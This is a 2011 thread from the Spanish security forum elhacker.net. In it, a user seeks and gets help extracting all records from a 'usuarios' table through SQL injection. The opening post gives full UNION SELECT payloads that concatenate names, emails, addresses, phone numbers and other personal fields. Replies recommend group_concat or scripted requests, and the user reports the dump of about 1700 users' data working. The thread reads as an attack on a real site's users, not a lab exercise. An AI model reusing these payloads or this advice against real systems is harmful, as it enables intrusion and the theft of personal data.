elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.
 
Inicio Ayuda Buscar Ingresar Registrarse
28 Mayo 2012, 05:50  


Tema destacado: Entra al canal IRC oficial de #elhacker.net

+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Bugs y Exploits
| | |-+  Nivel Web (Moderadores: sirdarckcat, WHK)
| | | |-+  Obtener todos los datos al mismo tiempo con SQLinjections
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: Obtener todos los datos al mismo tiempo con SQLinjections  (Leído 1,282 veces)
Lavacaloca

Desconectado Desconectado

Mensajes: 21



Ver Perfil
Obtener todos los datos al mismo tiempo con SQLinjections
« en: 24 Julio 2011, 17:54 »

Hola a todos, sigo con dudas de SQL injections (que no pude resolver solito).

Si quiero imprimir en pantalla todos los datos de todos los usuarios al mismo tiempo,¿ como tendría que hacer?
 Por que puedo hacerlo de 1 en 1 , con un "limit+1,1--"
Código: [Seleccionar]
(id=-1+union+all+select+1,concat(nombre,0x3a3a,apellido1,0x3a3a,apellido2,0x3a3a,username,0x3a3a,email,0x3a3a,empresa,0x3a3a,direccion,0x3a3a,telefono,0x3a3a,localidad,0x3a3a,codigo_postal,0x3a3a,pais),3,4,5,6,7+from+usuarios+limit+1,1--
Código: [Seleccionar]
(id=-1+union+all+select+1,concat(nombre,0x3a3a,apellido1,0x3a3a,apellido2,0x3a3a,username,0x3a3a,email,0x3a3a,empresa,0x3a3a,direccion,0x3a3a,telefono,0x3a3a,localidad,0x3a3a,codigo_postal,0x3a3a,pais),3,4,5,6,7+from+usuarios+limit+2,1--
, pero el problema es que son 1700 usuarios que quiero imprimirle los datos, ¿se puede todos al mismo tiempo?
« Última modificación: 26 Julio 2011, 14:39 por Lavacaloca » En línea

Sigo buscando información y/o posibles soluciones para abrir un puerto en el modem Huawei echolife Hg520c :(
Shell Root


Desconectado Desconectado

Mensajes: 2.456


Alex Jurado


Ver Perfil WWW
Re: Obtener todos los datos al mismo tiempo con SQLinjections
« Respuesta #1 en: 25 Julio 2011, 07:49 »

Ps a ver, eso lo puedes hacer de diferente formas, cuando printeas el valor puede que el mismo código te lo generé, -eso depende de la inplementación de la consulta con el lenguaje de programación-. O lo puedes hacer por medio de un lenguaje de programación que permita realizar peticiones HTTP, por ejemplo PHP, PERL, PYTHON, etc...
En línea

---
s E t H

Desconectado Desconectado

Mensajes: 151


Ha tenido un sueño donde todos los pollos eran libres de cruzar una carretera sin tener que justificar sus actos.


Ver Perfil WWW
Re: Obtener todos los datos al mismo tiempo con SQLinjections
« Respuesta #2 en: 26 Julio 2011, 11:55 »

No te lo va a dar en una petición, pero group_concat saca varios datos a la vez
En línea

Lavacaloca

Desconectado Desconectado

Mensajes: 21



Ver Perfil
Re: Obtener todos los datos al mismo tiempo con SQLinjections
« Respuesta #3 en: 26 Julio 2011, 14:48 »

No te lo va a dar en una petición, pero group_concat saca varios datos a la vez

(Creo que me había expresado mal, lo que quería sacar son los usuarios(con todos los datos) al mismo tiempo )

Funciono casi perfecto!!! Lo único malo es que me imprimía de a 10 usuarios y nada más, pero lo solucione con un "where+id<=50"  ---->  "where+id<=60"

Muchas gracias
En línea

Sigo buscando información y/o posibles soluciones para abrir un puerto en el modem Huawei echolife Hg520c :(
Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  

Powered by SMF 1.1.16 | SMF © 2006-2008, Simple Machines